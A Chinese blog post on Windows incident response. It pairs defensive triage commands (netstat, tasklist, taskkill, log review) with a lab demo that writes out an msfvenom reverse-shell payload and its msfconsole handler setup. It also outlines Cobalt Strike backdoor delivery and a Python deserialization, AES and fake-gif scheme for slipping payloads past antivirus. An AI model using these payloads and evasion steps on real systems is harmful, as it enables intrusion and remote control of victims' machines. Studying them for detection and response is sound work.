码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 应急响应.windows


    目录

    前言

    windows

    入侵排查

    1.1 检查系统账号安全

    1.2 检查异常端口、进程

    1.3检查系统相关信息

    1.4 日志分析

    实例演示

    win11应急响应

    环境1(未免杀)

    过程

    1.测试

    2.生成msf马

    3.客户端在攻击端网站下载恶意马

    4.msf上线shell

    5.客户端运行shell.exe--shell反弹上线

    6.应急响应

    6.1查看建立连接的可疑进程、端口

    6.2任务管理器查看可疑进程(不推荐)

    6.3资源管理器--监控近期网络活动连接--查找可疑连接进程

    ​6.4可疑进程分析查找工具

    6.5可疑进程查杀工具

    环境2(未免杀)

    过程

    1.生成cs马(不会被通过进程、端口扫描出来)

    2.客户端访问下载

    3.客户端运行artifact.exe--cs上线

    4.与msf区别

    4.1查询可疑进程和端口

    4.2通过资源管理器查看最近网络连接的可疑进程

    应急响应.python反序列化免杀

    思路

    环境

    1.使用cs生成payload并进行base64编码

    2.将编码后的内容放到外网服务器上

    3.将py.txt中的代码先进行序列化然后再进行base64编码

    4.将编码后的代码再进行aes加密

    5.对aes加密后再进行解密然后再序列化一次后再base64加密

    6.再对加密后的代码反序列化

    7.将生成的代码放入创建的test.txt,并将文件改为gif格式

    8.生成外链接,运行测试上线 (这里我省略了生成exe,工具:pyinstaller 命令:pyinstaller -F exp.py --noconsole )


    前言

    应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理、保护资产安全。主要是为了人们对网络安全有所认识、有所准备,以便应对突发的网络安全事件

    windows

    常见的应急响应事件:

    1. Web 入侵:网页挂马、主页篡改、Webshell
    2. 系统入侵:病毒木马、勒索软件、远控后门
    3. 网络攻击:DDOS 攻击、DNS 劫持、ARP 欺骗

    入侵排查

    排查思路:查看服务器是否被入侵(木马)查进程、查端口、查web日志

    1.1 检查系统账号安全

    1、查看服务器是否有弱口令,远程管理端口是否对公网开放

    2、查看服务器是否存在可疑账号、新增账号

    • 检查方法:打开 cmd 窗口,输入 lusrmgr.msc 命令,查看是否有新增/可疑的账号,如有管理员群组的(Administrators)里的新增账户,如有,请立即禁用或删除掉。注:部分系统版本不能使用这个方查看,可以使用用户、组查询语句查看

    1. #查看用户
    2. net user
    3. #查看组
    4. net localgroup

    3、查看服务器是否存在隐藏账号、克隆账号

    • 检查方法:

      a、打开注册表 ,查看管理员对应键值。

      b、使用D盾_web查杀工具,集成了对克隆账号检测的功能。

    4、结合日志,查看管理员登录时间、用户名是否存在异常

    • 检查方法:

      a、Win+R 打开运行,输入"eventvwr.msc",回车运行,打开“事件查看器”。

      b、导出 Windows 日志 -- 安全,利用微软官方工具 Log Parser 进行分析。

    1.2 检查异常端口、进程

    1、检查端口连接情况,是否有远程连接、可疑连接。

    • 检查方法:

      a、使用netstat -ano 命令查看目前的网络连接,定位可疑的 ESTABLISHED

    • b、根据 netstat 命令定位出的 PID 编号,再通过 tasklist 命令进行进程定位 tasklist | findstr "PID"

    2、进程

    • 检查方法:

           a、开始 -- 运行 -- 输入 msinfo32 命令,依次点击 "软件环境 -- 正在运行任务" 就可以查看到进程的详细信息,比如进程路径、进程ID、文件创建日期以及启动时间等。

           b、打开D盾_web查杀工具,进程查看,关注没有签名信息的进程。

           c、通过微软官方提供的 Process Explorer 、Process Moniter等工具进行排查 。

           d、查看可疑的进程及其子进程。可以通过观察以下内容:

    1. 没有签名验证信息的进程
    2. 没有描述信息的进程
    3. 进程的属主
    4. 进程的路径是否合法
    5. CPU 或内存资源占用长时间过高的进程
    1. #查询思路
    2. a、查看端口对应的 PID:
    3. netstat -ano | findstr "port"
    4. ​b、查看进程对应的 PID:
    5. (1)任务管理器 -- 查看 -- 选择列 -- PID
    6. (2)tasklist | findstr "PID"
    7. ​c、查看进程对应的程序位置:
    8. ​ 任务管理器 -- 选择对应进程 -- 右键打开文件位置
    9. ​ 运行输入 `wmic`,cmd 界面输入 `process`
    10. ​d、`tasklist /svc` 进程 -- PID -- 服务
    11. ​e、查看Windows服务所对应的端口:
    12. ​ %systemroot%/system32/drivers/etc/services(一般 %systemroot% 就是 C:\Windows 路径)

    1.3检查系统相关信息

    1、查看系统版本以及补丁信息

    • 检查方法:单击【开始】>【运行】,输入 systeminfo,查看系统信息。

    2、查找可疑目录及文件

    • 检查方法:

      a、 查看用户目录,新建账号会在这个目录生成一个用户目录,查看是否有新建用户目录。

           b、单击【开始】>【运行】,输入 %UserProfile%\Recent,分析最近打开分析可疑文件。

     

           c、在服务器各个目录,可根据文件夹内文件列表时间进行排序,查找可疑文件。

           d、回收站、浏览器下载目录、浏览器历史记录

           e、修改时间在创建时间之前的为可疑文

    1.4 日志分析

    Web 访问日志

    • 分析方法:

      a、找到中间件的web日志,打包到本地方便进行分析。

      b、推荐工具:Windows 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。Linux 下,使用 Shell 命令组合查询分析。

    EmEditor (文本编辑器) – 支持大文件和Unicode的最佳Windows文本编辑器!https://zh-cn.emeditor.com/

    实例演示

    win11应急响应

    环境1(未免杀)

    (1)客户端win11+攻击端kali(msfconsole)

    1. kali的IP:172.16.10.173
    2. win11的IP:192.168.78.175

    过程

    1.测试

     vim /etc/apache2/ports.conf

    win11测试访问情况

    2.生成msf马

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.10.173 LPORT=1314 -f exe > shell.exe
    

    3.客户端在攻击端网站下载恶意马

    因为这里我们没有做免杀所以在下载时关闭win11的实时防护

     注:apache服务访问时默认访问的是index.html所以如果要访问目录请删除html文件即可

    4.msf上线shell

    1. ┌──(root💀kali)-[~]
    2. └─# msfconsole
    3. msf6 > use exploit/multi/handler
    4. msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    5. msf6 exploit(multi/handler) > set lhost 172.16.10.173
    6. msf6 exploit(multi/handler) > set lport 1314
    7. msf6 exploit(multi/handler) > exploit

    5.客户端运行shell.exe--shell反弹上线

    6.应急响应

    6.1查看建立连接的可疑进程、端口

    6.1.1查找可疑的进程(看端口)

    netstat -ano | findstr "ESTAB"

    6.1.2定位PID

    1. #定位所有正在运行的进程
    2. tasklist /svc
    3. #定位指定进程
    4. tasklist /svc | findstr "PID"

    根据查看到的可疑进程进行定位

    6.1.3进程查杀

    1. #taskkill使用手册
    2. taskkill /?
    3. #示例
    4. taskkill /F /PID "PID" /T

    根据定位确认后对可疑进程终止

    6.2任务管理器查看可疑进程(不推荐)

    ctrl+alt+delete-->任务管理器

    6.3资源管理器--监控近期网络活动连接--查找可疑连接进程

    ctrl+alt+delete-->任务管理器-->性能-->打开资源管理器-->网络活动的进程

    6.4可疑进程分析查找工具

    火绒剑:火绒安全专业尽职 极致低调 只为巩固安全防线https://www.huorong.cn

    PCHunter:恶意代码检测 虚拟机脱壳. Rootkit检测 木马检测http://www.xuetr.com

    Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorerhttps://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer

    6.5可疑进程查杀工具

    卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exehttp://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe 火绒(火绒剑):火绒安全专业尽职 极致低调 只为巩固安全防线https://www.huorong.cn

    环境2(未免杀)

    (2)客户端win11+攻击端kali(cobalstrike) 

    1. kali的IP:192.168.78.178
    2. win11的IP:192.168.78.175

    过程

    1.生成cs马(不会被通过进程、端口扫描出来)

    设置监听器-->生成后门-->放入web目录下

    使用cobalstrike创建windows后门进程并放入/var/www/html

     

    2.客户端访问下载

    3.客户端运行artifact.exe--cs上线

    当客户端下载并运行后,cs就会上线

    4.与msf区别

    4.1查询可疑进程和端口

    此时注意在应急响应查询进程和端口就查不到可疑进程了,这和cs的执行框架有关

    但是通过查正在运行的进程可以发现

    4.2通过资源管理器查看最近网络连接的可疑进程

    应急响应.python反序列化免杀

    思路

    cs生成python后门---将payloadbase64加密---放入外网服务器下

    环境

    win10+外网服务器+kali(cs) 

    1.使用cs生成payload并进行base64编码

    进行base64编码

    2.将编码后的内容放到外网服务器上

    保存后使用python生成http服务器并指定端口3333

    测试访问(注意服务器的防火墙一定要关闭)

    3.将py.txt中的代码先进行序列化然后再进行base64编码

    4.将编码后的代码再进行aes加密

    5.对aes加密后再进行解密然后再序列化一次后再base64加密

    6.再对加密后的代码反序列化

    7.将生成的代码放入创建的test.txt,并将文件改为gif格式

    8.生成外链接,运行测试上线 (这里我省略了生成exe,工具:pyinstaller 命令:pyinstaller -F exp.py --noconsole )

    注意:这里的Crypto库需要下载替代库

    from Crypto.Cipher import AES

      

  • 相关阅读:
    超级好用的笔记工具------Typora 如何修改Typora 中图片保存的位置
    c++在线编辑器
    产品工作流| 需求分析
    新加坡服务器搭建网站出现PHP错误怎么处理?
    关于YOLOv8不显示GFlops的问题解决
    Linux之部署前后端分离项目
    【Python可视化大屏】「淄博烧烤」热评舆情分析大屏
    计算机网络_计算机的概念、组成、功能、分类
    【代码随想录】二刷-哈希表
    SourceTree使用技巧
  • 原文地址:https://blog.csdn.net/newlife1441/article/details/126408017
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号